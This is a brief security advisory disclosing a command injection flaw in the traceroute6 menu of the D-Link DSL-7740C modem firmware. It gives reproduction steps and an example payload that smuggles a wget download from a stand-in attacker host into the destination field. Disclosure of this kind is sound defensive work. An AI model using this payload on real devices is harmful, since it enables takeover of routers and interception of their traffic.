D-Link DSL-7740C
cpe:2.3:h:d-link:dsl-7740c:*:*:*:*:*:*:*
- DSL7740C.V6.TR069.20211230
A command injection vulnerability has been identified in the D-Link DSL-7740C modem, in firmware version DSL7740C.V6.TR069.20211230. The vulnerability exists within the traceroute6 function, which is reachable over SSH or Telnet with administrative credentials. Exploitation allows arbitrary command execution on the device.
Exploitation of this vulnerability leads to complete compromise of the device, allowing attackers to execute arbitrary commands with elevated privileges. This could disrupt service, alter device configurations, intercept or manipulate network traffic, and potentially breach the network perimeter to access sensitive areas.
The vulnerability can be reproduced by accessing the device via SSH or Telnet with administrative credentials. Navigate to the '19. Ping and Traceroute6 Test' menu option and select '03 Run Traceroute6 Test.' Input a specially crafted payload as the destination, such as '1 || wget http://ATTACKER_HOST/test_t6 -O /tmp/t6 #'. This will trigger the command injection, leading to arbitrary code execution on the device.